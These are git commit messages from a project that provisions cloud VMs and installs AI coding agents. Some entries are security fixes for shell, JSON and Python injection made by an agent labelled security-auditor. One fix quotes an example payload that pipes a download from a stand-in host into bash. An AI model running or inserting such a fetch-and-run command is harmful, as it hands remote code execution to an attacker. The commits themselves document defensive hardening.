- Validate SPAWN_ISSUE is a positive integer in both trigger-server.ts
and refactor.sh to prevent command injection via crafted issue params
- Use Python json.dumps for Render _render_create_service JSON body
instead of string interpolation (prevents JSON injection)
- Remove erroneous "api_key" 6th argument in Hyperstack generic_cloud_api
call that was being interpreted as max_retries, breaking all API calls
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Fix railway/gptme.sh calling nonexistent inject_env_vars_railway (should be inject_env_vars)
- Railway README: add missing NanoClaw and gptme agent entries
- Northflank README: add missing NanoClaw, Goose, Codex CLI, Open Interpreter, Gemini CLI agent entries and Environment Variables table
- Hyperstack README: restructure to match standard format with Agents section, use openrouter.ai/lab/spawn URLs instead of raw GitHub URLs, add 6 missing agents (Amazon Q, Cline, gptme, OpenCode, Plandex, Kilo Code), add Environment Variables table and Non-Interactive Mode section
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Implement hyperstack/kilocode.sh script that provisions a Hyperstack VM
and installs Kilo Code with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Implement hyperstack/plandex.sh script that provisions a Hyperstack VM
and installs Plandex with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Koyeb's inject_env_vars used sed escaping that didn't handle single quotes,
allowing API key values containing ' to break out of the shell command string
passed to `koyeb instances exec`. Replace with file-based injection using
generate_env_config + upload_file, matching the safe pattern in shared/common.sh.
Hyperstack goose/gemini/interpreter/codex scripts embedded $OPENROUTER_API_KEY
directly in double-quoted command strings passed to run_server (SSH). Values
containing double quotes, backticks, or $() could execute arbitrary commands
on the remote VM. Replace with inject_env_vars_ssh which writes env vars to a
temp file, uploads via SCP, and appends to shell config without interpolation.
Also hardens Koyeb upload_file to reject remote paths containing shell
metacharacters (', $, `, newline).
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Implement hyperstack/opencode.sh script that provisions a Hyperstack VM
and installs OpenCode with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Implements Amazon Q CLI on Hyperstack cloud provider. Uses Hyperstack's
VM provisioning API with SSH connectivity. Script installs Amazon Q CLI
via curl|bash, injects OpenRouter credentials as environment variables,
and launches interactive Q chat session.
OpenRouter integration via OPENAI_BASE_URL override pointing to
openrouter.ai/api/v1.
Agent: gap-filler-hyperstack-1
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Implement gptme agent on Hyperstack cloud platform.
- Install via pip/pip3
- Native OpenRouter support via OPENROUTER_API_KEY
- Launch with -m openrouter/${MODEL_ID} flag
- Uses Hyperstack VM provisioning and SSH primitives
- OAuth flow for API key (port 5181)
Agent: gap-filler-hyperstack-3
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
The create_vm function interpolated $environment (HYPERSTACK_ENVIRONMENT
env var or user prompt) and $image (HYPERSTACK_IMAGE env var) directly
into Python code using single-quote string literals. An attacker who
controls these env vars could break out of the string and execute
arbitrary Python code (e.g., os.system('curl evil.com|bash')).
Fix: Pass all values via stdin to Python instead of shell interpolation.
This eliminates the injection vector entirely, matching the pattern used
to fix similar issues in other providers (Scaleway, UpCloud, etc.).
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
